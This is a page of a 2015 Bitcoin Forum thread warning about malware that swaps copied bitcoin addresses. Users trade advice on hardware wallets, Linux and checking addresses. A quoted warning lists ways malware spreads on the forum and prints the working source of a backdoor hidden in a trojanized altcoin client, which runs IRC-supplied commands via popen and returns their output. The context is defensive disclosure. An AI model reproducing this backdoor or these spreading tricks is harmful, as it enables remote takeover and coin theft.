Bitcoin Forum
November 11, 2024, 10:27:41 PM *
News: Check out the artwork 1Dq created to commemorate this forum's 15th anniversary
 
   Home   Help Search Login Register More  
Pages: « 1 [2] 3 4 »  All
  Print  
Author Topic: Bitcoin Malware  (Read 4056 times)
cellard
Legendary
*
Offline Offline

Activity: 1372
Merit: 1252


View Profile
August 31, 2015, 11:54:44 PM
 #21

So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.
Habeler876
Hero Member
*****
Offline Offline

Activity: 624
Merit: 500



View Profile
September 01, 2015, 12:04:45 AM
 #22

So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

I can't say for sure in this case, but mostly people get infected with mallware binded to some legit .exe, or via Java-drive-by. In either case both browsers are not to blame,
since it's not an exploit of sorts, but rather a diversion (jdb mostly asks you to update codecs, or update java version.. etc)

maokoto
Hero Member
*****
Offline Offline

Activity: 770
Merit: 500


✪ NEXCHANGE | BTC, LTC, ETH & DOGE ✪


View Profile WWW
September 01, 2015, 01:07:40 AM
 #23

i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  Smiley

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.


RGBKey
Hero Member
*****
Offline Offline

Activity: 854
Merit: 658


rgbkey.github.io/pgp.txt


View Profile WWW
September 01, 2015, 01:10:14 AM
 #24

i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  Smiley

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.


I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.
Carlton Banks
Legendary
*
Offline Offline

Activity: 3430
Merit: 3080



View Profile
September 01, 2015, 01:11:27 AM
 #25

i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  Smiley

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.



Don't just check the address you're sending to, check the change address for that transaction also, it too can be substituted for an attacker's address.

Vires in numeris
nero987
Sr. Member
****
Offline Offline

Activity: 259
Merit: 250


View Profile
September 01, 2015, 06:17:27 AM
 #26

So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc Tongue).
Meanwhile there are dozens of "new" versions of this malware with other process names then "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an adress is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.
S4VV4S
Hero Member
*****
Offline Offline

Activity: 1582
Merit: 502


View Profile
September 01, 2015, 07:32:15 AM
 #27

i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  Smiley

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.


I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.

That is true, but it's usually the simple things in life that work better Wink
flock123
Member
**
Offline Offline

Activity: 98
Merit: 10


View Profile
September 01, 2015, 07:48:50 AM
 #28

i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  Smiley

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.


I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.

That is true, but it's usually the simple things in life that work better Wink
I think also that, if it wants to avoid malware such, we must also have a strong security system in our computer
neoneros
Sr. Member
****
Offline Offline

Activity: 462
Merit: 250


I can draw your avatar!


View Profile WWW
September 01, 2015, 08:42:31 AM
 #29

i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  Smiley

it is safer to store your coins on a hardware wallet:

https://bitcointalk.org/index.php?topic=899253.0

it is, but sometimes you need to pay for something online, you need to copy the addresses, it might be easier to check and find the flaw, but it is still a risk that the address sending too is changed when copy-pasted.

Thanks for the warning, do scan my devices regularly, not just for the bitcoin, better safe than sorry.

RustyNomad
Sr. Member
****
Offline Offline

Activity: 336
Merit: 251



View Profile WWW
September 01, 2015, 08:52:23 AM
 #30

Thanks to OP for the warning and reminding us that we are all targets in one way or another.

Guess we will see more and more of this kind of malware and even more so when the bitcoin price is high again.

Just glad I'm using a Trezor but there are still times where I just copy an address from Electrum (Trezor watch only wallet) to paste it into a website. Will make a point in future to double check addresses and not just the first 3 and last 3 characters as I usually do.
louise123
Sr. Member
****
Offline Offline

Activity: 462
Merit: 250



View Profile
September 01, 2015, 08:55:34 AM
 #31

I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?

██████
███
███
███
███
███
███
███
███
███
███
███
███
                ▄███
             ▄███▌ █
            ▀▀▀██▄  █
          ▄███▄▄ ▀▀▀█
         █ █████▀▀▀▄▄
        ▄██ ███▄    █
       ▐███▀   ▀█   █
       ████     █   █
      ▄██▀▄█▄▄▄█▀   █
      ▀▄▄███▌      █
  ▄▄▄▀▀▀████       █
▄▀    ██ ██       █
▐▌     ██▌▐▌      ▀▄
█      ██ █         ▀▄
█      █▀▄▌          █
█   ▄▀█▄██           █
█ ▄▀      ▀▀▄▄▀▄     █
▀▀             █    █
              █  ▄▀
              ▀▄█
     ▀█████████████▄▄
 ▀ ▀▀▀███████████████▌
  ▀ ▀▀▀▀██▀▀▀▀▀▀██████         ▄███████▄      ▄▄███████▄    ▄███▄    ▄███▄ ▄███▄      ▄███▄
▀ ▀▀▀▀█████▄▄▄▄▄▄█████▌       ▄████▀▀▀████▄   ▐████▀▀█████   ▀████▄ ▄████▀ █████▄    ▄█████
   ▀▀███████████████▀       █████     ████▌          ████▌    ▀████████▀    █████▄  ▄█████▌
  ▀ ▀████████████████▀ ▀    ██████████████▌   ▄▄██████████     ▄██████▄      █████▄▄█████▌
    ██████      ██▀▀▀▀▀▀▀ ▀ █████▀▀▀▀▀▀▀▀    █████▀▀▀█████    ▄████████▄      ██████████▌
    ██████▄▄▄▄▄▄██████▄ ▄    ████▄▄   ▄▄█▄   ████▄  ▄█████ ▄█████▀▀█████▄     ████████▌
    █████████████████▀        ▀███████████   ▀████████████  ████▀    ▀████      ██████▌
    ██████████████▀▀             ▀▀▀▀▀▀▀       ▀▀▀▀▀▀ ▀▀▀    ▀▀        ▀▀        █████
                                                                               ▄█████
                                                                           ▄███████▀
                                                                           ▀████▀▀
███
███
███
███
███
███
███
███
███
███
███
███
██████
|█████████████████
███████████████████
█████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
  WHITEPAPER 
 LIGHTPAPER
|Instant Deposit
✓ 24/7 Support
Referral Program
nero987
Sr. Member
****
Offline Offline

Activity: 259
Merit: 250


View Profile
September 01, 2015, 10:54:02 AM
 #32

I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?


Like I've mentionned above, this particular part of malware is mostly distributed through pdf's...
Carlton Banks
Legendary
*
Offline Offline

Activity: 3430
Merit: 3080



View Profile
September 01, 2015, 11:37:01 AM
 #33

I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?


Like I've mentionned above, this particular part of malware is mostly distributed through pdf's...

There's a safe .pdf reader in the OS I use (https://qubes-os.org). It converts the vector data in the .pdf into a bitmap, and deletes the original .pdf, along with all the scripting that can secrete any malware. Linux only.  

Vires in numeris
Amph
Legendary
*
Offline Offline

Activity: 3248
Merit: 1070



View Profile
September 01, 2015, 11:40:24 AM
 #34

Linux.

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

or simply don't download random stuff from the web, problem solved, i still have my hot wallet intact, since years, and no malware has stole anything from my desktop

malware do not infect your pc without you doing something wrong
NeuroticFish
Legendary
*
Offline Offline

Activity: 3850
Merit: 6585


Looking for campaign manager? Contact icopress!


View Profile
September 01, 2015, 11:43:53 AM
 #35

Chrome is the malware.


it seems logical ...  Grin

You made me doublecheck Smiley
As usual, the malware seems to be using names quite similar with known software.
The normal browser is chrome.exe, not chrome32.
I guess that the same story goes to acrobat reader too, but since I don't use it I cannot check.


But really, the ones who run windoze with no antivirus on... they just ask for it.

███████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████

███████████████████████
.
BC.GAME
▄▄▀▀▀▀▀▀▀▄▄
▄▀▀░▄██▀░▀██▄░▀▀▄
▄▀░▐▀▄░▀░░▀░░▀░▄▀▌░▀▄
▄▀▄█▐░▀▄▀▀▀▀▀▄▀░▌█▄▀▄
▄▀░▀░░█░▄███████▄░█░░▀░▀▄
█░█░▀░█████████████░▀░█░█
█░██░▀█▀▀█▄▄█▀▀█▀░██░█
█░█▀██░█▀▀██▀▀█░██▀█░█
▀▄▀██░░░▀▀▄▌▐▄▀▀░░░██▀▄▀
▀▄▀██░░▄░▀▄█▄▀░▄░░██▀▄▀
▀▄░▀█░▄▄▄░▀░▄▄▄░█▀░▄▀
▀▄▄▀▀███▄███▀▀▄▄▀
██████▄▄▄▄▄▄▄██████
.
..CASINO....SPORTS....RACING..


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
medUSA
Legendary
*
Offline Offline

Activity: 952
Merit: 1005


--Signature Designs-- http://bit.ly/1Pjbx77


View Profile WWW
September 01, 2015, 11:53:15 AM
 #36

As bitcoin grows in popularity, more of these malware will creep up to steal your coins. I believe a dedicated machine (PC or phone) for bitcoin with nothing else installed is the only way out of this. If these malware replaces bitcoin address while we copy and paste, even hardware wallets are vulnerable. Embarrassed
Carlton Banks
Legendary
*
Offline Offline

Activity: 3430
Merit: 3080



View Profile
September 01, 2015, 11:56:10 AM
 #37

Linux.

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

or simply don't download random stuff from the web, problem solved, i still have my hot wallet intact, since years, and no malware has stole anything from my desktop

malware do not infect your pc without you doing something wrong

Feeling confident about opening .pdfs? Or browsing unknown websites?

I've only got 1 PC (well, and a Raspberry Pi), it seems like overkill to have a separate PC just for bitcoin, but I guess it's been successful in keeping your coins safe.

If these malware replaces bitcoin address while we copy and paste, even hardware wallets are vulnerable. Embarrassed

Not with the Trezor hardware wallet. It has a screen that displays the address you're sending to before you sign the transaction.

Vires in numeris
lite
Legendary
*
Offline Offline

Activity: 1400
Merit: 1009


View Profile
September 01, 2015, 12:21:57 PM
 #38

Linux is the best if you want protection against malware. Also if you're doing larger transaction it's recommended to use live Linux OS from your USB. I prefer to use Ubuntu, but there are lots of other Linux OS one can choose. Wink
mallard
Full Member
***
Offline Offline

Activity: 196
Merit: 100


View Profile
September 01, 2015, 12:22:58 PM
 #39

Do any of the popular virus scanners detect this?
XCASH
Legendary
*
Offline Offline

Activity: 929
Merit: 1000


View Profile
September 01, 2015, 12:40:46 PM
 #40

Do any of the popular virus scanners detect this?

I don't know, but you can't always rely on virus scanners to detect something. The quote below is stickied at the top of the alt coin board, but some of it also applies to Bitcoin. Hackers can make crypted malware that virus scanners don't detect.

Also hackers can code apparently useful legit software that uses such simple techniques to steal wallets that it goes undetected by virus scanners. It's obvious from the source code that there's wallet stealing code there, but very few people read source code before using software.






In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Pages: « 1 [2] 3 4 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!